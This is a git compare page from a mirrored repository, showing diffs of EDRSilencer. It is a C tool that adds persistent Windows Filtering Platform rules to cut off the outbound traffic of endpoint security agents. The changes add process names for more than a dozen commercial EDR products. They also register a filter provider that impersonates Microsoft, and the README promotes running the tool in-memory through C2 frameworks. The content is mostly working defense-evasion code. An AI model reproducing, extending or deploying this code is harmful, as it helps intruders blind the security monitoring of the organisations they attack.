Mirrors/netero1010-edrsilencer
1
0
Fork 0
mirror of https://github.com/netero1010/EDRSilencer.git synced 2026-06-09 17:37:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: Mirrors/netero1010-edrsilencer:1.0
Branches Tags
Mirrors/netero1010-edrsilencer:main
Mirrors/netero1010-edrsilencer:1.4 Mirrors/netero1010-edrsilencer:1.3 Mirrors/netero1010-edrsilencer:1.2 Mirrors/netero1010-edrsilencer:1.1 Mirrors/netero1010-edrsilencer:1.0
...
compare: Mirrors/netero1010-edrsilencer:1.2
Branches Tags
Mirrors/netero1010-edrsilencer:main
Mirrors/netero1010-edrsilencer:1.4 Mirrors/netero1010-edrsilencer:1.3 Mirrors/netero1010-edrsilencer:1.2 Mirrors/netero1010-edrsilencer:1.1 Mirrors/netero1010-edrsilencer:1.0

9 Commits
1.0 ... 1.2

Author SHA1 Message Date
netero1010 fb8f4b43a9 Version 1.2 2024-01-05 01:34:33 +08:00
netero1010 2c3a1c5e09 Update to include Cisco Secure Endpoint (credit @logdumpster). Also, removed CrowdStrike from the supporting list as blocking its service process is insufficient. Require further testing 2024-01-02 18:03:47 +08:00
netero1010 7988dae6bf Update to include Cisco Secure Endpoint (credit @logdumpster). Also, removed CrowdStrike from the supporting list as blocking its service process is insufficient. Require further testing 2024-01-02 18:02:49 +08:00
netero1010 6287d391ed Remove EDRSilencer.exe 2023-12-30 19:39:25 +08:00
netero1010 59e76a8aaa Update README.md 2023-12-30 19:38:31 +08:00
netero1010 e238862577 Update README.md 2023-12-30 19:36:57 +08:00
netero1010 d544a9fbb1 Added more EDR solutions (e.g., CrowdStrike, Carbon Black) to the list 2023-12-30 19:07:02 +08:00
Chris Au 2f16f16813 Merge pull request #2 from logdumpster/main 
Added Qualys EDR process
 2023-12-30 19:00:51 +08:00
logdumpster 7bffc66426 Added Qualys EDR process 
Added Qualys EDR process
 2023-12-29 01:05:03 -06:00
4 changed files with 256 additions and 55 deletions
Expand all files Collapse all files
EDRSilencer.c
+221 -39
View File
@@ -4,18 +4,83 @@ char* edrProcess[] = {
// Microsoft Defender for Endpoint and Microsoft Defender Antivirus // Microsoft Defender for Endpoint and Microsoft Defender Antivirus
"MsMpEng.exe", "MsMpEng.exe",
"MsSense.exe", "MsSense.exe",
"SenseIR.exe",
"SenseNdr.exe",
"SenseCncProxy.exe",
"SenseSampleUploader.exe",
// Elastic EDR // Elastic EDR
"winlogbeat.exe",
"elastic-agent.exe", "elastic-agent.exe",
"elastic-endpoint.exe", "elastic-endpoint.exe",
"filebeat.exe", "filebeat.exe",
// Trellix EDR // Trellix EDR
"xagt.exe" "xagt.exe",
// Qualys EDR
"QualysAgent.exe",
// SentinelOne
"SentinelAgent.exe",
"SentinelAgentWorker.exe",
"SentinelServiceHost.exe",
"SentinelStaticEngine.exe",
"LogProcessorService.exe",
"SentinelStaticEngineScanner.exe",
"SentinelHelperService.exe",
"SentinelBrowserNativeHost.exe",
// Cylance
"CylanceSvc.exe",
// Cybereason
"AmSvc.exe",
"CrAmTray.exe",
"CrsSvc.exe",
"ExecutionPreventionSvc.exe",
"CybereasonAV.exe",
// Carbon Black EDR
"cb.exe",
// Carbon Black Cloud
"RepMgr.exe",
"RepUtils.exe",
"RepUx.exe",
"RepWAV.exe",
"RepWSC.exe",
// Tanium
"TaniumClient.exe",
"TaniumCX.exe",
"TaniumDetectEngine.exe",
// Palo Alto Networks Traps/Cortex XDR
"Traps.exe",
"cyserver.exe",
"CyveraService.exe",
"CyvrFsFlt.exe",
// FortiEDR
"fortiedr.exe",
// Cisco Secure Endpoint (Formerly Cisco AMP)
"sfc.exe",
// ESET Inspect
"EIConnector.exe",
// Harfanglab EDR
"hurukai.exe",
//TrendMicro Apex One
"CETASvc.exe",
"WSCommunicator.exe",
"EndpointBasecamp.exe",
"TmListen.exe",
"Ntrtscan.exe",
"TmWSCSvc.exe",
"PccNTMon.exe",
"TMBMSRV.exe",
"CNTAoSMgr.exe",
"TmCCSF.exe"
}; };
BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE }; BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE };
// The "unblockall" feature will delete all filters that are based on the custom filter name // The "unblockall" feature will delete all filters that are based on the custom filter name
WCHAR* filterName = L"Custom Outbound Filter"; WCHAR* filterName = L"Custom Outbound Filter";
WCHAR* providerName = L"Microsoft Corporation";
// provider description has to be unique because:
// - avoid problem in adding persistent WFP filter to a provider (error 0x80320016)
// - avoid removing legitimate WFP provider
WCHAR* providerDescription = L"Microsoft Windows WFP Built-in custom provider.";
// d78e1e87-8644-4ea5-9437-d809ecefc971 // d78e1e87-8644-4ea5-9437-d809ecefc971
DEFINE_GUID( DEFINE_GUID(
@@ -47,7 +112,7 @@ DEFINE_GUID(
// Check if the running process is our list // Check if the running process is our list
BOOL isInEdrProcessList(const char* procName) { BOOL isInEdrProcessList(const char* procName) {
for (int i = 0; i < sizeof(edrProcess) / sizeof(edrProcess[0]); i++) { for (int i = 0; i < sizeof(edrProcess) / sizeof(edrProcess[0]); i++) {
if (strstr(procName, edrProcess[i]) != NULL && !inWfpFlag[i]) { if (strcmp(procName, edrProcess[i]) == 0 && !inWfpFlag[i]) {
inWfpFlag[i] = TRUE; inWfpFlag[i] = TRUE;
return TRUE; return TRUE;
} }
@@ -55,16 +120,67 @@ BOOL isInEdrProcessList(const char* procName) {
return FALSE; return FALSE;
} }
// Get provider GUID by description
BOOL GetProviderGUIDByDescription(PCWSTR providerDescription, GUID* outProviderGUID) {
DWORD result = 0;
HANDLE hEngine = NULL;
HANDLE enumHandle = NULL;
FWPM_PROVIDER0** providers = NULL;
UINT32 numProviders = 0;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
return FALSE;
}
result = FwpmProviderCreateEnumHandle0(hEngine, NULL, &enumHandle);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderCreateEnumHandle0 failed with error code: 0x%x\n", result);
FwpmEngineClose0(hEngine);
return FALSE;
}
result = FwpmProviderEnum0(hEngine, enumHandle, 100, &providers, &numProviders);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderEnum0 failed with error code: 0x%x\n", result);
FwpmEngineClose0(hEngine);
return FALSE;
}
for (UINT32 i = 0; i < numProviders; i++) {
if (providers[i]->displayData.description != NULL) {
if (wcscmp(providers[i]->displayData.description, providerDescription) == 0) {
*outProviderGUID = providers[i]->providerKey;
return TRUE;
}
}
}
if (providers) {
FwpmFreeMemory0((void**)&providers);
}
FwpmProviderDestroyEnumHandle0(hEngine, enumHandle);
FwpmEngineClose0(hEngine);
return FALSE;
}
// Add WFP filters for all known EDR process(s) // Add WFP filters for all known EDR process(s)
void BlockEdrProcessTraffic() { void BlockEdrProcessTraffic() {
HANDLE hEngine; DWORD result = 0;
FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); HANDLE hEngine = NULL;
HANDLE hProcessSnap; HANDLE hProcessSnap = NULL;
HANDLE hModuleSnap; HANDLE hModuleSnap = NULL;
PROCESSENTRY32 pe32; PROCESSENTRY32 pe32 = {0};
MODULEENTRY32 me32;
BOOL isEdrDetected = FALSE; BOOL isEdrDetected = FALSE;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
return;
}
EnableSeDebugPrivilege(); EnableSeDebugPrivilege();
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
@@ -87,20 +203,25 @@ void BlockEdrProcessTraffic() {
// Get full path of the running process // Get full path of the running process
HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID); HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID);
if (hProcess) { if (hProcess) {
WCHAR fullPath[MAX_PATH]; WCHAR fullPath[MAX_PATH] = {0};
DWORD size = MAX_PATH; DWORD size = MAX_PATH;
QueryFullProcessImageNameW(hProcess, 0, fullPath, &size); FWPM_FILTER_CONDITION0 cond = {0};
FWPM_FILTER_CONDITION0 cond;
FWPM_FILTER0 filter = {0}; FWPM_FILTER0 filter = {0};
FWP_BYTE_BLOB* appId; FWPM_PROVIDER0 provider = {0};
GUID providerGuid = {0};
FWP_BYTE_BLOB* appId = NULL;
UINT64 filterId = 0;
if (FwpmGetAppIdFromFileName0(fullPath, &appId) != ERROR_SUCCESS) { QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
printf(" [-] FwpmGetAppIdFromFileName0 failed to get app ID.\n"); DWORD result = FwpmGetAppIdFromFileName0(fullPath, &appId);
if (result != ERROR_SUCCESS) {
printf(" [-] FwpmGetAppIdFromFileName0 failed to get app ID with error code: 0x%x\n", result);
CloseHandle(hProcess); CloseHandle(hProcess);
continue; continue;
} }
// Setting up WFP filter and condition // Sett up WFP filter and condition
filter.displayData.name = filterName; filter.displayData.name = filterName;
filter.flags = FWPM_FILTER_FLAG_PERSISTENT; filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4; filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
@@ -112,8 +233,22 @@ void BlockEdrProcessTraffic() {
filter.filterCondition = &cond; filter.filterCondition = &cond;
filter.numFilterConditions = 1; filter.numFilterConditions = 1;
UINT64 filterId; // Add WFP provider for the filter
DWORD result; if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
} else {
provider.displayData.name = providerName;
provider.displayData.description = providerDescription;
provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
result = FwpmProviderAdd0(hEngine, &provider, NULL);
if (result != ERROR_SUCCESS) {
printf(" [-] FwpmProviderAdd0 failed with error code: 0x%x\n", result);
} else {
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
}
}
}
// Add filter to both IPv4 and IPv6 layers // Add filter to both IPv4 and IPv6 layers
result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
@@ -149,19 +284,27 @@ void BlockEdrProcessTraffic() {
// Add block WFP filter to user-defined process // Add block WFP filter to user-defined process
void BlockProcessTraffic(char* fullPath) { void BlockProcessTraffic(char* fullPath) {
HANDLE hEngine; DWORD result = 0;
FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); HANDLE hEngine = NULL;
WCHAR wFullPath[MAX_PATH] = {0};
WCHAR wFullPath[MAX_PATH];
DWORD size = MAX_PATH; DWORD size = MAX_PATH;
CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0])); FWPM_FILTER_CONDITION0 cond = {0};
FWPM_FILTER_CONDITION0 cond;
FWPM_FILTER0 filter = {0}; FWPM_FILTER0 filter = {0};
FWPM_PROVIDER0 provider = {0};
GUID providerGuid = {0};
FWP_BYTE_BLOB* appId = NULL;
UINT64 filterId = 0;
FWP_BYTE_BLOB* appId;
if (FwpmGetAppIdFromFileName0(wFullPath, &appId) != ERROR_SUCCESS) { result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
printf("[-] FwpmGetAppIdFromFileName0 failed to get app ID. Please check if the process path is valid.\n"); if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
return;
}
CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0]));
result = FwpmGetAppIdFromFileName0(wFullPath, &appId);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmGetAppIdFromFileName0 failed to get app ID with error code: 0x%x. Please check if the process path is valid.\n", result);
return; return;
} }
@@ -177,8 +320,22 @@ void BlockProcessTraffic(char* fullPath) {
filter.filterCondition = &cond; filter.filterCondition = &cond;
filter.numFilterConditions = 1; filter.numFilterConditions = 1;
UINT64 filterId; // Add WFP provider for the filter
DWORD result; if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
} else {
provider.displayData.name = providerName;
provider.displayData.description = providerDescription;
provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
result = FwpmProviderAdd0(hEngine, &provider, NULL);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderAdd0 failed with error code: 0x%x\n", result);
} else {
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
}
}
}
// Add filter to both IPv4 and IPv6 layers // Add filter to both IPv4 and IPv6 layers
result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
@@ -203,10 +360,11 @@ void BlockProcessTraffic(char* fullPath) {
// Remove all WFP filters previously created // Remove all WFP filters previously created
void UnblockAllWfpFilters() { void UnblockAllWfpFilters() {
HANDLE hEngine; HANDLE hEngine = NULL;
DWORD result; DWORD result = 0;
HANDLE enumHandle; HANDLE enumHandle = NULL;
FWPM_FILTER0** filters; FWPM_FILTER0** filters = NULL;
GUID providerGuid = {0};
UINT32 numFilters = 0; UINT32 numFilters = 0;
BOOL foundFilter = FALSE; BOOL foundFilter = FALSE;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
@@ -249,6 +407,17 @@ void UnblockAllWfpFilters() {
} }
} }
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
if (result != ERROR_SUCCESS) {
if (result != FWP_E_IN_USE) {
printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x\n", result);
}
} else {
printf("Deleted custom WFP provider.\n");
}
}
if (!foundFilter) { if (!foundFilter) {
printf("[-] Unable to find any WFP filter created by this tool.\n"); printf("[-] Unable to find any WFP filter created by this tool.\n");
} }
@@ -258,8 +427,9 @@ void UnblockAllWfpFilters() {
// Remove WFP filter based on filter id // Remove WFP filter based on filter id
void UnblockWfpFilter(UINT64 filterId) { void UnblockWfpFilter(UINT64 filterId) {
HANDLE hEngine; HANDLE hEngine = NULL;
DWORD result; DWORD result = 0;
GUID providerGuid = {0};
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) { if (result != ERROR_SUCCESS) {
@@ -278,19 +448,31 @@ void UnblockWfpFilter(UINT64 filterId) {
printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result); printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result);
} }
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
if (result != ERROR_SUCCESS) {
if (result != FWP_E_IN_USE) {
printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x\n", result);
}
} else {
printf("Deleted custom WFP provider.\n");
}
}
FwpmEngineClose0(hEngine); FwpmEngineClose0(hEngine);
} }
void PrintHelp() { void PrintHelp() {
printf("Usage: EDROutBlock.exe <blockedr/block/unblockall/unblock>\n"); printf("Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>\n");
printf("Version: 1.2\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n"); printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n");
printf(" EDROutBlock.exe blockedr\n\n"); printf(" EDRSilencer.exe blockedr\n\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n"); printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n");
printf(" EDROutBlock.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n"); printf(" EDRSilencer.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n");
printf("- Remove all WFP filters applied by this tool:\n"); printf("- Remove all WFP filters applied by this tool:\n");
printf(" EDROutBlock.exe unblockall\n\n"); printf(" EDRSilencer.exe unblockall\n\n");
printf("- Remove a specific WFP filter based on filter id:\n"); printf("- Remove a specific WFP filter based on filter id:\n");
printf(" EDROutBlock.exe unblock <filter id>"); printf(" EDRSilencer.exe unblock <filter id>");
} }
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
README.md
+19 -1
View File
@@ -8,7 +8,25 @@ This tool offers the following features:
- Remove a specific WFP filter by filter id - Remove a specific WFP filter by filter id
- Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`) - Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`)
**The current EDR process block list (edrProcess) includes only a limited number of EDR solutions (e.g., MDE, Elastic EDR). It would be appreciated if someone could assist in expanding the process list in `EDRSilencer.c` to encompass a broader range of other EDR solutions.** The tool currently supports the following EDRs:
- Microsoft Defender for Endpoint and Microsoft Defender Antivirus
- Elastic EDR
- Trellix EDR
- Qualys EDR
- SentinelOne
- Cylance
- Cybereason
- Carbon Black EDR
- Carbon Black Cloud
- Tanium
- Palo Alto Networks Traps/Cortex XDR
- FortiEDR
- Cisco Secure Endpoint (Formerly Cisco AMP)
- ESET Inspect
- Harfanglab EDR
- TrendMicro Apex One
**As I do not have access to all these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in `EDRSilencer.c`) prove insufficient in blocking all alert, detection, or event forward traffic.**
## Testing Environment ## Testing Environment
Tested in Windows 10 and Windows Server 2016 Tested in Windows 10 and Windows Server 2016
utils.c
+13 -13
View File
@@ -1,20 +1,20 @@
#include "utils.h" #include "utils.h"
BOOL CheckProcessIntegrityLevel() { BOOL CheckProcessIntegrityLevel() {
HANDLE hToken; HANDLE hToken = NULL;
DWORD dwLength = 0; DWORD dwLength = 0;
PTOKEN_MANDATORY_LABEL pTIL = NULL; PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel; DWORD dwIntegrityLevel = 0;
BOOL isHighIntegrity = FALSE; BOOL isHighIntegrity = FALSE;
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &hToken)) { if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &hToken)) {
if (GetLastError() != ERROR_NO_TOKEN) { if (GetLastError() != ERROR_NO_TOKEN) {
printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenThreadToken failed with error code: 0x%x\n", GetLastError());
return FALSE; return FALSE;
} }
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenProcessToken failed with error code: 0x%x\n", GetLastError());
return FALSE; return FALSE;
} }
} }
@@ -22,20 +22,20 @@ BOOL CheckProcessIntegrityLevel() {
// Get the size of the integrity level information // Get the size of the integrity level information
if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLength) && if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLength) &&
GetLastError() != ERROR_INSUFFICIENT_BUFFER) { GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError()); printf("[-] GetTokenInformation failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, dwLength); pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, dwLength);
if (pTIL == NULL) { if (pTIL == NULL) {
printf("[-] LocalAlloc failed with error code:0x%x\n", GetLastError()); printf("[-] LocalAlloc failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLength, &dwLength)) { if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLength, &dwLength)) {
printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError()); printf("[-] GetTokenInformation failed with error code: 0x%x\n", GetLastError());
LocalFree(pTIL); LocalFree(pTIL);
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
@@ -57,22 +57,22 @@ BOOL CheckProcessIntegrityLevel() {
// Enable SeDebugPrivilege to obtain full path of running processes // Enable SeDebugPrivilege to obtain full path of running processes
BOOL EnableSeDebugPrivilege() { BOOL EnableSeDebugPrivilege() {
HANDLE hToken = NULL; HANDLE hToken = NULL;
TOKEN_PRIVILEGES tokenPrivileges = { 0 }; TOKEN_PRIVILEGES tokenPrivileges = {0};
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, TRUE, &hToken)) { if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, TRUE, &hToken)) {
if (GetLastError() != ERROR_NO_TOKEN) { if (GetLastError() != ERROR_NO_TOKEN) {
printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenThreadToken failed with error code: 0x%x\n", GetLastError());
return FALSE; return FALSE;
} }
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) { if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenProcessToken failed with error code: 0x%x\n", GetLastError());
return FALSE; return FALSE;
} }
} }
if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tokenPrivileges.Privileges[0].Luid)){ if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tokenPrivileges.Privileges[0].Luid)){
printf("[-] LookupPrivilegeValueA failed with error code:0x%x\n", GetLastError()); printf("[-] LookupPrivilegeValueA failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
@@ -81,7 +81,7 @@ BOOL EnableSeDebugPrivilege() {
tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) { if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
printf("[-] AdjustTokenPrivileges failed with error code:0x%x\n", GetLastError()); printf("[-] AdjustTokenPrivileges failed with error code: 0x%x\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
@@ -100,7 +100,7 @@ void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wC
int result = MultiByteToWideChar(CP_UTF8, 0, charArray, -1, wCharArray, wCharArraySize); int result = MultiByteToWideChar(CP_UTF8, 0, charArray, -1, wCharArray, wCharArraySize);
if (result == 0) { if (result == 0) {
printf("[-] MultiByteToWideChar failed with error code:0x%x\n", GetLastError()); printf("[-] MultiByteToWideChar failed with error code: 0x%x\n", GetLastError());
wCharArray[0] = L'\0'; wCharArray[0] = L'\0';
} }
} }
utils.h
+1
View File
@@ -5,6 +5,7 @@
#include <tlhelp32.h> #include <tlhelp32.h>
#define FWPM_FILTER_FLAG_PERSISTENT (0x00000001) #define FWPM_FILTER_FLAG_PERSISTENT (0x00000001)
#define FWPM_PROVIDER_FLAG_PERSISTENT (0x00000001)
BOOL CheckProcessIntegrityLevel(); BOOL CheckProcessIntegrityLevel();
BOOL EnableSeDebugPrivilege(); BOOL EnableSeDebugPrivilege();
void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize); void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize);